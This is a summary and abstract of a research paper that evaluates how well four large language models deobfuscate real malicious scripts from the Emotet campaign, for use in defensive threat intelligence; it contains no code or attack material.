Assessing LLMs in Malicious Code Deobfuscation of Real-world Malware Campaigns

TL;DR

This paper evaluates the ability of state-of-the-art large language models to deobfuscate real-world malicious scripts from the Emotet malware campaign, highlighting their potential for enhancing AI-driven cybersecurity defenses.

Contribution

It provides an empirical assessment of LLMs' deobfuscation capabilities on real malware, demonstrating their potential and limitations for cybersecurity applications.

Findings

Some LLMs can effectively deobfuscate malicious payloads

Fine-tuning improves LLM performance in malware deobfuscation

LLMs show promise for future AI-powered threat intelligence

Abstract

The integration of large language models (LLMs) into various pipelines is increasingly widespread, effectively automating many manual tasks and often surpassing human capabilities. Cybersecurity researchers and practitioners have recognised this potential. Thus, they are actively exploring its applications, given the vast volume of heterogeneous data that requires processing to identify anomalies, potential bypasses, attacks, and fraudulent incidents. On top of this, LLMs' advanced capabilities in generating functional code, comprehending code context, and summarising its operations can also be leveraged for reverse engineering and malware deobfuscation. To this end, we delve into the deobfuscation capabilities of state-of-the-art LLMs. Beyond merely discussing a hypothetical scenario, we evaluate four LLMs with real-world malicious scripts used in the notorious Emotet malware campaign. Our results indicate that while not absolutely accurate yet, some LLMs can efficiently deobfuscate such payloads. Thus, fine-tuning LLMs for this task can be a viable potential for future AI-powered threat intelligence pipelines in the fight against obfuscated malware.